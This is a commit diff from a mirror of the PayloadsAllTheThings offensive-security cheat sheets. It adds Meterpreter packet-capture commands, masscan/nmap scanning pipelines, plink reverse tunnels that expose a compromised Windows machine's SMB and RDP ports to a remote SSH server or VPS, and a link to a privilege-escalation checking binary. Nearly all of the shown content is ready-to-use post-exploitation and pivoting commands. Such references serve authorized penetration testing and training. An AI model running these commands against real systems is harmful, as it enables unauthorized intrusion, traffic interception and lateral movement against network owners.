mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Network Discovery - Masscan update
This commit is contained in:
parent
6c161f26b2
commit
bb305d0183
@ -10,6 +10,7 @@
|
||||
* [Meterpreter Webdelivery](#meterpreter-webdelivery)
|
||||
* [Get System](#get-system)
|
||||
* [Persistence Startup](#persistence-startup)
|
||||
* [Network Monitoring](#network-monitoring)
|
||||
* [Portforward](#portforward)
|
||||
* [Upload / Download](#upload---download)
|
||||
* [Execute from Memory](#execute-from-memory)
|
||||
@ -130,6 +131,16 @@ OPTIONS:
|
||||
meterpreter > run persistence -U -p 4242
|
||||
```
|
||||
|
||||
### Network Monitoring
|
||||
|
||||
```powershell
|
||||
# list interfaces
|
||||
run packetrecorder -li
|
||||
|
||||
# record interface n°1
|
||||
run packetrecorder -i 1
|
||||
```
|
||||
|
||||
### Portforward
|
||||
|
||||
```powershell
|
||||
|
@ -103,8 +103,21 @@ List Nmap scripts : ls /usr/share/nmap/scripts/
|
||||
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
|
||||
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
|
||||
|
||||
masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp
|
||||
masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst
|
||||
# find machines on the network
|
||||
sudo masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp
|
||||
cat masscan_machines.tmp | grep open | cut -d " " -f4 | sort -u > masscan_machines.lst
|
||||
|
||||
# find open ports for one machine
|
||||
sudo masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst
|
||||
|
||||
|
||||
# TCP grab banners and services informations
|
||||
TCP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep tcp | cut -d " " -f3 | tr '\n' ',' | head -c -1)
|
||||
[ "$TCP_PORTS" ] && sudo nmap -sT -sC -sV -v -Pn -n -T4 -p$TCP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_tcp $MACHINE_IP
|
||||
|
||||
# UDP grab banners and services informations
|
||||
UDP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep udp | cut -d " " -f3 | tr '\n' ',' | head -c -1)
|
||||
[ "$UDP_PORTS" ] && sudo nmap -sU -sC -sV -v -Pn -n -T4 -p$UDP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_udp $MACHINE_IP
|
||||
```
|
||||
|
||||
## Reconnoitre
|
||||
|
@ -195,10 +195,17 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
|
||||
## plink
|
||||
|
||||
```powershell
|
||||
plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 --> exposes the RDP port of the machine in the port 3390 of the SSH Server
|
||||
# exposes the SMB port of the machine in the port 445 of the SSH Server
|
||||
plink -l root -pw toor -R 445:127.0.0.1:445
|
||||
# exposes the RDP port of the machine in the port 3390 of the SSH Server
|
||||
plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389
|
||||
|
||||
plink -l root -pw mypassword 192.168.18.84 -R
|
||||
plink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445
|
||||
|
||||
plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
|
||||
# redirects the Windows port 445 to Kali on port 22
|
||||
plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185
|
||||
```
|
||||
|
||||
## ngrok
|
||||
|
@ -490,7 +490,8 @@ net start upnphost
|
||||
sc config upnphost depend=""
|
||||
```
|
||||
|
||||
Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals.
|
||||
Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals or [accesschk-XP.exe - github.com/phackt](https://github.com/phackt/pentest/blob/master/privesc/windows/accesschk-XP.exe)
|
||||
|
||||
```powershell
|
||||
$ accesschk.exe -uwcqv "Authenticated Users" * /accepteula
|
||||
RW SSDPSRV
|
||||
@ -588,7 +589,6 @@ Check if these registry values are set to "1".
|
||||
|
||||
```bat
|
||||
$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||
|
||||
$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||
```
|
||||
|
||||
|
Before Width: | Height: | Size: 424 B After Width: | Height: | Size: 424 B |
Before Width: | Height: | Size: 992 B After Width: | Height: | Size: 992 B |
Loading…
Reference in New Issue
Block a user